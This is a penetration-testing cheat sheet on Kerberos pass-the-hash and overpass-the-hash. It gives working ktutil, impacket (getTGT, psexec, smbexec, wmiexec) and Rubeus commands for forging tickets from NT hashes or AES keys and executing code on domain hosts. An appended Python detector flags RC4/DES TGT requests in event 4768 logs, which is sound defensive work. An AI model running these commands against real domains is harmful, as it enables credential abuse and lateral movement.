PTH and Over PTH
Pass the Hash
https://malicious.link/post/2018/pass-the-hash-with-kerberos/
ktutil
addent -p <user>@<FQDN_DOMAIN> -k 1 -key -e rc4-hmac
# paste the NT hash when ktutil prompts for the key; the realm (<FQDN_DOMAIN>) is case-sensitive and normally upper-case
wkt /tmp/a.keytab
exit
kinit -V -k -t /tmp/a.keytab -f <user>@<FQDN_DOMAIN>
klist
Overpass the Hash
Stealthier when requested with the AES key instead of the NT hash
Impacket
Request TGT
python getTGT.py <domain>/<user> -hashes [<lm_hash>]:<nt_hash>
python getTGT.py <domain>/<user> -aesKey <aes_key>
python getTGT.py <domain>/<user>:<password>
Set TGT for impacket
export KRB5CCNAME=<tgt.file>
RCE via ticket
python psexec.py <domain>/<user>@<host> -k -no-pass
python smbexec.py <domain>/<user>@<host> -k -no-pass
python wmiexec.py <domain>/<user>@<host> -k -no-pass
Rubeus
Ask and inject
.\Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt
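The NT-hash variants above (impacket -hashes, Rubeus /rc4:) request a TGT with the RC4-HMAC ticket encryption type, which is what makes them less stealthy than the AES key: on a domain where AES is the norm, that etype stands out in the domain controller's 4768 (TGT requested) events. The following detection logic is an added example, not part of the original notes; the event records are constructed samples in a simplified key=value form, and the allowed_accounts list is a hypothetical exception list for legacy accounts.

```python
"""Flag Kerberos TGT requests (Windows Security event 4768) that used an
RC4 or DES ticket encryption type, a common indicator that the request was
made with an NT hash rather than a password or AES key."""

# Ticket encryption type codes as logged in the 4768 "TicketEncryptionType" field.
ETYPE_NAMES = {
    "0x1": "DES-CBC-CRC",
    "0x3": "DES-CBC-MD5",
    "0x11": "AES128-CTS-HMAC-SHA1-96",
    "0x12": "AES256-CTS-HMAC-SHA1-96",
    "0x17": "RC4-HMAC",
    "0x18": "RC4-HMAC-EXP",
}
WEAK_ETYPES = {"0x1", "0x3", "0x17", "0x18"}

# Constructed sample records (key=value lines mirroring the 4768 XML fields;
# a real feed would come from the event log or a SIEM field set).
SAMPLE_EVENTS = [
    "EventID=4768 TargetUserName=alice TargetDomainName=CORP.LOCAL IpAddress=10.0.0.5 TicketEncryptionType=0x12 Status=0x0",
    "EventID=4768 TargetUserName=svc_backup TargetDomainName=CORP.LOCAL IpAddress=10.0.0.77 TicketEncryptionType=0x17 Status=0x0",
    "EventID=4769 TargetUserName=bob TargetDomainName=CORP.LOCAL IpAddress=10.0.0.9 TicketEncryptionType=0x17 Status=0x0",
    "EventID=4768 TargetUserName=nobody TargetDomainName=CORP.LOCAL IpAddress=10.0.0.5 TicketEncryptionType=0x17 Status=0x6",
]

def parse_event(line):
    """Turn one 'k=v k=v ...' record into a dict."""
    return dict(field.split("=", 1) for field in line.split())

def find_weak_tgt_requests(lines, allowed_accounts=()):
    """Return (user, ip, etype name) for every successful 4768 event whose
    ticket encryption type is RC4 or DES. Accounts named in allowed_accounts
    (hypothetical legacy systems that still need RC4) are skipped."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        # Only TGT requests (4768) that succeeded (Status 0x0); 4769 is a
        # service ticket request and failed requests are a different signal.
        if ev.get("EventID") != "4768" or ev.get("Status") != "0x0":
            continue
        etype = ev.get("TicketEncryptionType", "")
        if etype in WEAK_ETYPES and ev["TargetUserName"].lower() not in allowed_accounts:
            hits.append((ev["TargetUserName"], ev["IpAddress"], ETYPE_NAMES.get(etype, etype)))
    return hits

if __name__ == "__main__":
    for user, ip, etype in find_weak_tgt_requests(SAMPLE_EVENTS):
        print(f"weak TGT encryption type {etype} for {user} from {ip}")
```

A hit from a host or account that has no legacy reason to use RC4 is worth correlating with the source host's logon events, since a TGT obtained this way is typically followed by the psexec/smbexec/wmiexec style lateral movement listed above.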